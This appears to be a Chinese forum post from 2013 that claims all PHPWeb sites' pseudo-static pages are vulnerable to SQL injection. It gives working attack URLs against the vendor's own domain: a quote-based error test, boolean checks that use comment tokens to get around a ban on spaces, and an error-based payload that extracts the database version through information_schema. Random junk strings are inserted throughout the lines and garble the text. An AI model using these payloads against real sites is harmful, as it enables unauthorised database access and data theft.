phpweb所有的整站程序伪静态页面都存在sql注入
8 t& e9 S( F x4 }& A! A) R+ d
5 ]8 l2 u# L+ o3 C- d6 a/ G主站:http://phpweb.net/
4 w4 X) B6 f+ ?( J) A, l" [+ T加’检测:
9 U, h! l; \8 C) [$ v6 b( E
# ?' m; O1 d5 R7 bhttp://www.phpweb.net/down/html/?772′.html6 t3 _: v+ v H2 P' b/ ^
* j5 B' F: z+ [; a8 E出错5 D+ v% L, T. z: }# _. z9 r$ x+ K
存在注入。
5 ]( v+ T8 Y" d% g2 B+ q6 k; K不能用空格,只能用/*罗
$ h: h0 [8 M+ V9 X+ p( Z; Ihttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常9 ?, e) w7 h- W. y
& g4 g) v* ~+ g0 U' s5 z0 o
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.! i: C1 q& S0 z" c: n) d% c' a4 K
爆数据库版本:" {' d: s* [* ^4 s) M% h
& J$ T9 J# y) [9 H1 z6 u- i) E/ f3 c?0 g! a) C( N) Q. [# w
1
K- ]+ W6 C4 U& Whttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
% ?# ~5 a) `. ?% g4 `& Z更新日期: 2013-01-03 13:39:50
: q1 |1 g( p: T4 r8 W5 a0 g3 p h |
发表于 2013-1-4 19:46:42
收藏
支持
反对